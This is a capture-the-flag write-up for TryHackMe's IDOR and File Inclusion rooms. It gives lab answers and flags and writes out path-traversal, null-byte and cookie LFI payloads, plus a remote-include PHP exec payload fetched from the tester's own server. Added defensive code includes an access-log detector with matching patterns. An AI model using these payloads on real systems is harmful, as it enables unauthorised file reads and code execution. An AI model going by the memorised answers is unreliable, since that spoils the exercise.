Task 1 What is an IDOR?
IDOR stands for Insecure Direct Object Reference and is a type of access control vulnerability.
Task 2 An IDOR Example
In some cases, if the user changes the value in the query, they may find information belonging to other users.
Task 3 Finding IDORs in Encoded IDs
The flow of string tampering:
Task 4 Finding IDORs in Hashed IDs
Values of MD5 hashes can be looked up at:
Task 5 Finding IDORs in Unpredictable IDs
If the Id cannot be detected using the above methods, an excellent method of IDOR detection is to create two accounts and swap the Id numbers between them. If you can view the other users’ content using their Id number while still being logged in with a different account (or not logged in at all), you’ve found a valid IDOR vulnerability.
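The two-account swap test from above, written as an added example rather than code from the room: a minimal lookup that takes the user id base64-encoded (the "encoded IDs" case), the same lookup with an object-level authorization check, and a function that performs the swap test against either. USERS, the session values and the account names are constructed for the example.

```python
import base64
import binascii

# Constructed sample store: two accounts, as in the swap test.
USERS = {
    1: {"username": "alice", "email": "alice@example.test"},
    2: {"username": "bob", "email": "bob@example.test"},
}


def encode_id(user_id):
    """The id as the client sees it in the query string (base64 of the number)."""
    return base64.b64encode(str(user_id).encode()).decode()


def decode_id(token):
    """Undo the encoding; returns None for anything that is not a valid token."""
    try:
        return int(base64.b64decode(token, validate=True))
    except (ValueError, binascii.Error):
        return None


def get_user_vulnerable(session_user_id, token):
    """IDOR: returns whatever record the client asked for. Encoding the id
    is not access control, because decode_id() is all a tester needs."""
    return USERS.get(decode_id(token))


def get_user_fixed(session_user_id, token):
    """Object-level authorization: the caller may only read their own record,
    and there must be a session at all."""
    requested = decode_id(token)
    if session_user_id is None or requested != session_user_id:
        return None  # a real handler answers 403 or 404 here
    return USERS.get(requested)


def swap_test(handler):
    """Task 5's check: logged in as user 1, request user 2's object, then
    repeat with no session. True means the endpoint leaks."""
    token_for_2 = encode_id(2)
    leaked_logged_in = handler(1, token_for_2) is not None
    leaked_anonymous = handler(None, token_for_2) is not None
    return leaked_logged_in or leaked_anonymous
```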
Task 6 Where are IDORs located
Task 7 A Practical IDOR Example
Open the link, create a new account and log in.
Open the developer tools and go to the Network tab; we can see a call:
What is the username for user id 1?
adam84
What is the email address for user id 3?
j@fakemail.thm
File Inclusion
Task 1 Introduction
What is the risk of File inclusion?
It depends! If the attacker can use a file inclusion vulnerability to read sensitive data, a successful attack leaks that data, including code and files related to the web application and credentials for back-end systems. Moreover, if the attacker can somehow write to the server, for example to the /tmp directory, then it is possible to gain remote command execution (RCE). However, the vulnerability is far less useful if it gives no access to sensitive data and no ability to write to the server.
Task 2 Deploy the VM
Deploy the virtual machine and connect to the TryHackMe network.
Task 3 Path Traversal
What function causes path traversal vulnerabilities in PHP?
file_get_contents
The web app is served at /var/www/app
URL query: http://webapp.thm/get.php?file=app/CVs/userCV.pdf
We can access userCV.pdf from the path /var/www/app/CVs/userCV.pdf.
To navigate to the root directory: http://webapp.thm/get.php?file=../../../../
Then add the path to /etc/passwd: http://webapp.thm/get.php?file=../../../../etc/passwd
Task 4 Local File Inclusion — LFI
Lab 1: there is no fixed directory inside the function and no input validation, so we can access /etc/passwd directly.
Lab 2: the include function lets us include any named file into the current page. The exploit is: http://webapp.thm/index.php?lang=../../../../etc/passwd
Task 5 Local File Inclusion — LFI #2
Give Lab #3 a try to read /etc/passwd. What does the request look like?
http://10.10.27.34/lab3.php?file=../../../../etc/passwd%00
If we add a random string such as asa to the query, we get the response:
Therefore we know we need four ../ to navigate to the root directory. Now we correct the query to
Again we get an error. As the task mentioned, we need to drop the .php by adding %00, because the include function appends .php to the input.
Which function is causing the directory traversal in Lab #4?
/lab3.php?file=../../../../etc/passwd%00
Try out Lab #6 and check which directory has to be in the input field.
We add a random string to the query and get the response:
THM-profile
Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?
12.04
Task 6 Remote File Inclusion — RFI
Requirement for opening an RFI: allow_url_fopen needs to be on
The risk of RFI is higher than LFI since RFI vulnerabilities allow an attacker to gain Remote Command Execution (RCE) on the server. Other consequences of a successful RFI attack include:
- Sensitive Information Disclosure
- Cross-site Scripting (XSS)
- Denial of Service (DoS)
Create the cmd.txt:
Run a python web server on your local machine:
On your lab browser:
You also see a request logged on your local machine if the target fetched your local cmd.txt successfully:
Task 7 Remediation
- Keep system and services, including web application frameworks, updated with the latest version.
- Turn off PHP errors to avoid leaking the path of the application and other potentially revealing information.
- A Web Application Firewall (WAF) is a good option to help mitigate web application attacks.
- Disable the PHP features that enable file inclusion vulnerabilities if your web app doesn’t need them, such as allow_url_fopen and allow_url_include.
- Carefully analyze the web application and allow only the protocols and PHP wrappers that are actually needed.
- Never trust user input, and make sure to implement proper input validation against file inclusion.
- Implement whitelisting for file names and locations as well as blacklisting.
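The allowlisting and input-validation points above, as an added example that is not the room's code: one resolver for a parameter that selects among a fixed set of files (the lang case) and one for user-named files (the CV download from Task 3), both rejecting the traversal and %00 payloads used earlier. BASE_DIR, the languages subdirectory and LANG_FILES are assumed layout for the example.

```python
import os
from urllib.parse import unquote

BASE_DIR = "/var/www/app"       # web root from Task 3 (assumed layout)
LANG_FILES = {"EN", "AR"}       # constructed allowlist for the lang parameter


def _decode(user_value):
    """Undo URL encoding and reject embedded null bytes (%00)."""
    value = unquote(user_value)
    # Null bytes truncate the string in PHP file functions before 5.3.4;
    # refuse them regardless of the PHP version in use.
    if "\x00" in value:
        return None
    return value


def resolve_lang(user_value):
    """Allowlist approach: the parameter may only name a known file."""
    value = _decode(user_value)
    if value is None or value not in LANG_FILES:
        return None
    return os.path.join(BASE_DIR, "languages", value + ".php")


def resolve_download(user_value, base_dir=BASE_DIR):
    """Containment approach for user-named files: normalise the path and
    confirm it is still inside base_dir after symlinks and ../ are resolved."""
    value = _decode(user_value)
    # No absolute paths and no URL schemes (blocks the RFI form outright).
    if value is None or os.path.isabs(value) or "://" in value:
        return None
    root = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(root, value))
    if os.path.commonpath([root, full]) != root:
        return None
    return full
```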
Task 8 Challenge
Steps for testing for LFI
- Find an entry point that could be via GET, POST, COOKIE, or HTTP header values!
- Enter a valid input to see how the web server behaves.
- Enter invalid inputs, including special characters and common file names.
- Don’t assume that what you type into an input form is what gets sent! Use either the browser address bar or a tool such as Burp Suite.
- Look for errors while entering invalid input to disclose the current path of the web application; if there are no errors, then trial and error might be your best option.
- Understand the input validation and if there are any filters!
- Try to inject a valid entry to read sensitive files.
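The defender's counterpart to the testing steps above, as an added example that is not part of the room: a small scanner that pulls the request target out of web-server access-log lines and flags the indicators this writeup relies on (../ traversal, %00 truncation, a parameter pointing at a remote file, PHP stream wrappers, well-known sensitive paths). The log lines are constructed; the third and fourth mirror the Lab #3 and playground requests.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined-log style, trimmed).
SAMPLE_LOG = """\
10.10.1.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?lang=EN HTTP/1.1" 200 512
10.10.1.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?lang=../../../../etc/passwd HTTP/1.1" 200 1843
10.10.1.5 - - [01/Jan/2024:10:00:09 +0000] "GET /lab3.php?file=../../../../etc/passwd%00 HTTP/1.1" 200 1843
10.10.1.5 - - [01/Jan/2024:10:00:12 +0000] "GET /playground.php?file=http://10.10.1.5:8000/cmd.txt HTTP/1.1" 200 77
10.10.1.9 - - [01/Jan/2024:10:00:15 +0000] "GET /get.php?file=app/CVs/userCV.pdf HTTP/1.1" 200 9001
"""

# Pull the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')


def classify_request(path):
    """Return the list of file-inclusion indicators found in one request path."""
    # Decode twice so double-encoded sequences (%252e%252e) are seen as well.
    decoded = unquote(unquote(path))
    findings = []
    if "\x00" in decoded:                                   # %00 truncation attempt
        findings.append("null-byte")
    if re.search(r"\.\.[/\\]", decoded):                    # ../ or ..\ traversal
        findings.append("traversal")
    if re.search(r"=(?:https?|ftp)://", decoded, re.I):     # parameter names a remote file
        findings.append("remote-include")
    if re.search(r"=(?:php|data|expect)://", decoded, re.I):  # PHP stream wrappers
        findings.append("php-wrapper")
    if re.search(r"/etc/(?:passwd|shadow|flag)", decoded):  # common read targets
        findings.append("sensitive-path")
    return findings


def scan_log(text):
    """Return (path, findings) for every request line that trips an indicator."""
    alerts = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = classify_request(match.group("path"))
        if findings:
            alerts.append((match.group("path"), findings))
    return alerts


if __name__ == "__main__":
    for path, findings in scan_log(SAMPLE_LOG):
        print(f"{path}  ->  {', '.join(findings)}")
```

Raising an alert on the first "traversal" hit, even when the response code is 200 and the byte count is small, is what catches the trial-and-error phase before a working payload is found.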
Capture Flag1 at /etc/flag1
Use Burp Suite to change the method; right-click:
OR use the curl command in a terminal:
curl -X POST 10.10.66.13/challenges/chall1.php -d "method=post&file=/etc/flag1"
Capture Flag2 at /etc/flag2
Edit the cookie in BurpSuite:
Change the Guest value to /etc/flag2, but we still get an error:
Then we refresh the page and change the THM cookie to:
Cookie: THM=../../../../etc/flag2%00
Capture Flag3 at /etc/flag3
Use the following command to receive the source code.
P0st_1s_w0rk1in9
Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?
Create a file on your local machine containing the following:
<?php print exec('hostname'); ?>
Start a simple HTTP server.
Enter the following URL in your browser, replacing the IP with your own virtual machine’s IP address.
lfi-vm-thm-f8c5b1a78692